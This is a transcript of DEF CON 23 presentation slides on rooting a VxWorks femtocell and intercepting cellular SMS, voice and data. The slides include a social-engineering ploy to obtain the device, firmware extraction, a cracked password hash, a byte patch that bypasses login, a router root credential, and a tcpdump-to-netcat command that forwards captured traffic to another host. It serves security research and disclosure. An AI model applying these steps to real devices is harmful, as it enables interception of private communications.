DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained...
Transcript of DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained...
![Page 1: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/1.jpg)
Build a free cellular traffic capture tool with a vxworks based femoto
Hacking Femtocell
Hacking Femtocell 1
Yuwei Zheng @DEF CON 23Haoqi Shan @DEF CON 23From: 360 Unicorn Team
![Page 2: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/2.jpg)
Main contents
Hacking Femtocell
• About us• Why do we need it• How to get a free Femtocell• Deeply Hack• Capture packets• Summary and Reference
2
![Page 3: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/3.jpg)
About us
Hack Femtocell
• 360 Unicorn Team• Radio & Hardware Security Research• Consists of a group of brilliant security researchers• Focus on the security of anything that uses radio
technologies• RFID, NFC, WSN• GPS, UAV, Smart Cars, Telecom, SATCOM
• Our primary mission• Guarantee that Qihoo360 is not vulnerable to any wireless attack• Qihoo360 protects its users and we protect Qihoo360
• One of the Defcon 23 vendors• https://www.defcon.org/html/defcon-23/dc-23-vendors.html
3
![Page 4: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/4.jpg)
About me
Hacking Femtocell
• Yuwei Zheng• a senior security researcher concentrated in embedded systems• reversed blackberry BBM, PIN, BIS push mail protocol• decrypted the RIM network stream successfully in 2011• finished a MITM attack for blackberry BES
• Haoqi Shan• a wireless/radio security researcher in Unicorn Team• obtained bachelor degree of electronic engineering in 2015• focuses on Wi-Fi penetration, GSM system, router/switcher
hacking
4
![Page 5: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/5.jpg)
Why do we need it
Hacking Femtocell
• Research on products integrated cellular modem• Capture and hijack
• SMS• Voice• Data traffic
5
![Page 6: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/6.jpg)
Why not software-based GSM base station
Hacking Femtocell
• OpenBTS• USRP• GNU Radio• Why not?
• Data traffic hijack• Access denied to operator core network• NO real uplink & downlink SMS hijack
6
![Page 7: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/7.jpg)
Femtocell’s advantages
Hacking Femtocell
• Access to network operator• What a hacked Femtocell can do
• SMS and Data traffic• Capture• Hijack• Modify
• Even more…• Roaming in operator’s network
7
![Page 8: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/8.jpg)
Use Femtocell in research
Hacking Femtocell
• Cellular modem integrated devices• Capture or modify control order
• SMS• 2G
• Capture or modify circle data• SMS• 2G
• Trusted data link?• Find your system vulnerability
8
![Page 9: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/9.jpg)
How to get a free Femtocell
Hacking Femtocell
• Can’t be bought?• Social engineering• Complains to Customer Service
• Bad network signal • Again and again• Make a complaint to management
• Finally“Sir, we will set up a femtocell in your home, I hope this device can make your network signal better. ”
9
![Page 10: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/10.jpg)
Let’s hack it
Hacking Femtocell
• Inside the femtocell• Home NodeB• Router with Wi-Fi• 1 Wan port• 2 Lan port• Router configuration page IP
• 192.168.197.1• Home NodeB configuration page IP
• 192.168.197.241
10
![Page 11: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/11.jpg)
Quick and simple port scan
Hacking Femtocell
• nmap –sT –sU 192.168.197.241
11
![Page 12: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/12.jpg)
Try to log in
Hacking Femtocell
• Try telnet/ftp/http/tftp
12
• Seems like VxWorks OS• Error password again and again?
• Longer and longer time between prompt shows up• Forget about brute force
![Page 13: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/13.jpg)
Err… it’s VxWorks…
Hacking Femtocell
• VxWorks• a real-time operating system developed as proprietary software• designed for use in embedded systems requiring real-time
• safety and security certification• for industries, such as aerospace and defense• medical devices, industrial equipment
• Notable uses• The Mars Reconnaissance Orbiter• Northrop Grumman X-47B Unmanned Combat Air System• Apple Airport Extreme
• Proprietary software
• Well, seems much harder to be hacked than Linux-based Femtocell
13
![Page 14: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/14.jpg)
wdbprc(dump memory)
Hacking Femtocell
• VxWorks system debug interface• Exploit in metasploit by H.D.Moore• Failed in use
14
![Page 15: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/15.jpg)
wdbprc(scan version)
Hacking Femtocell
• Scanner in metasploit by H.D.Moore• Repaired
15
![Page 16: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/16.jpg)
Dismantling the hardware
Hacking Femtocell
• Home NodeB• OMAPL138E
• DSP• ARM9
• FPGA• Router
• AR9341• Router• Wi-Fi AP
16
![Page 17: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/17.jpg)
Find the UART interface
Hacking Femtocell
• Hmmm… easy!
17
![Page 18: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/18.jpg)
Use the gift
Hacking Femtocell
• Interrupt the boot process• Get more useful information
18
![Page 19: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/19.jpg)
Play with bootshell
Hacking Femtocell 19
![Page 20: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/20.jpg)
Bootparm
Hacking Femtocell
• Use `p’ show bootparm
20
![Page 21: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/21.jpg)
What’s inside
Hacking Femtocell 21
![Page 22: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/22.jpg)
What’s inside
Hacking Femtocell
• tffs0• Directory Structure
• common• configuration file
• user1• running version VxWorks system and apps
• user2• last version VxWorks system and apps
• wlanBackup• router firmware backup files
22
![Page 23: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/23.jpg)
Download the firmware
Hacking Femtocell
• use tftp port
• Where is it?• `cp’• `tftp get’• One by one
23
![Page 24: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/24.jpg)
Analyze the firmware
Hacking Femtocell
• use `cp’ command• cp /tffs0/user1/mpcs.Z host:/ftpforvx/user1/mpcs.Z• cp /tffs0/blabla host:/blabla
• load kernel by command `l’
24
• mpcs.Z base address 0xc010000
![Page 25: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/25.jpg)
Deflate the kernel image
Hacking Femtocell
• mpcs.Z• 《Understanding the bootrom image》• vxWorks compressed by deflate?
• WindRiver deflate header• Head magic 05 15 01 00, 4 bytes• Length , 4 bytes• Flag 08, 1bytes
• Skip the first 9 bytes, zlib-flate it!
25
![Page 26: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/26.jpg)
Deflate the kernel image
Hacking Femtocell
• dd if=./mpcs.Z of=./mpcs.deflate ibs=1 obs=1 skip=9• zlib-flate -uncompress < mpcs.deflate > mpcs.out• strings mpcs.out | grep –i “copyright”• Success!
26
![Page 27: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/27.jpg)
Recovery login password
Hacking Femtocell
• Login init process• user name• password hash
27
![Page 28: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/28.jpg)
Recovery login password
Hacking Femtocell
• Decrypt password hash• 73l8gRjwLftklgfdXT+MdiMEjJwGPVMsyVxe16iYpk8=
• Base64 encode?• EF797C8118F02DFB649607DD5D3F8C7623048C9C063D532
CC95C5ED7A898A64F
• I’m feeling lucky• http://www.hashkiller.co.uk/• SHA256• 12345678
• /• Always try 88888888 12345678 first!
28
![Page 29: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/29.jpg)
Patch it
Hacking Femtocell
• Not weak password?• Find the authenticate function
29
![Page 30: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/30.jpg)
Patch it
Hacking Femtocell
• Bypass login process• patch the firmware• zlib compress it• add vxWorks header number• download file by ftp
• Hot patch• Boot shell
• `l’ command unzip and load mpcs.Z• `m’ command patch
• 0xc0574d64• DF FF FF 0A -> DF FF FF EA• BEQ loc_C0574CE8 -> B loc_C0574CE8
30
![Page 31: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/31.jpg)
vxWorks kernel shell
Hacking Femtocell
• Log in then debug the kernel• Lots of tools
• Debug it!• `func’
• Modify it!• `mem’
31
![Page 32: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/32.jpg)
Capture data packets
Hacking Femtocell
• Forward• telnet router
• root:5up• tcpdump -n -i br0 -s 0 -w - host not 192.168.197.104 | netcat
192.168.197.104 9527 &• nc -l -v -p 9527 >> sms.pcap
• Listen• mirror router port• wireshark• real-time
32
![Page 33: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/33.jpg)
Capture data packets
Hacking Femtocell 33
![Page 34: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/34.jpg)
Encrypted?
Hacking Femtocell
• Read log file, IPSec?• Find the enc key and auth key
34
![Page 35: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/35.jpg)
Fix protocol port
Hacking Femtocell
• IPSec• 500 -> 60295 ISAKMP• 4500 -> 60296 UDPENCAP
35
![Page 36: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/36.jpg)
Now decrypt it
Hacking Femtocell
• Edit ESP SAs• Add uplink and downlink SA separately
36
![Page 37: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/37.jpg)
Wrong protocol
Hacking Femtocell
• Iu-h protocol?
37
![Page 38: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/38.jpg)
Find the answer
Hacking Femtocell
• Reverse GSM board firmware
38
![Page 39: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/39.jpg)
Rebuild Wireshark
Hacking Femtocell
• Write our own dissector?• Complicated…
• ASN1• RUA• RANAP• Blablabla…
• Analyze packets byte by byte• Fix the wireshark dissector rules• Rebuild it!• Voilà
39
![Page 40: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/40.jpg)
Capture SMS
Hacking Femtocell 40
![Page 41: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/41.jpg)
Capture voice
Hacking Femtocell 41
![Page 42: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/42.jpg)
Capture GPRS data
Hacking Femtocell 42
![Page 43: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/43.jpg)
Capture GPRS data
Hacking Femtocell 43
![Page 44: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/44.jpg)
Capture your email
Hacking Femtocell 44
![Page 45: DEF CON 23 Presentation · •a wireless/radio security researcher in Unicorn Team •obtained bachelor degree of electronic engineering in 2015 •focuses on Wi-Fi penetration, GSM](https://reader036.fdocuments.net/reader036/viewer/2022081600/60242b34c140503e0b0292cc/html5/thumbnails/45.jpg)
Summary and References
Hacking Femtocell
• Summary• VxWorks is not easy to hack• More mining, more fun• Wanna know more? Feel free to contact us
• References• TRAFFIC INTERCEPTION AND REMOTE MOBILE PHONE CLONING WITH A
COMPROMISED CDMA FEMTOCELL -https://www.nccgroup.trust/globalassets/newsroom/us/blog/documents/2013/femtocell.pdf
• VxWorks Command-Line Tools User's Guide -http://88.198.249.35/d/VxWorks-Application-Programmer-s-Guide-6-6.pdf
• VxWorks Application Programmer's Guide, 6.6 –http://read.pudn.com/downloads149/ebook/646091/vxworks_application_programmers_guide_6.6.pdf
45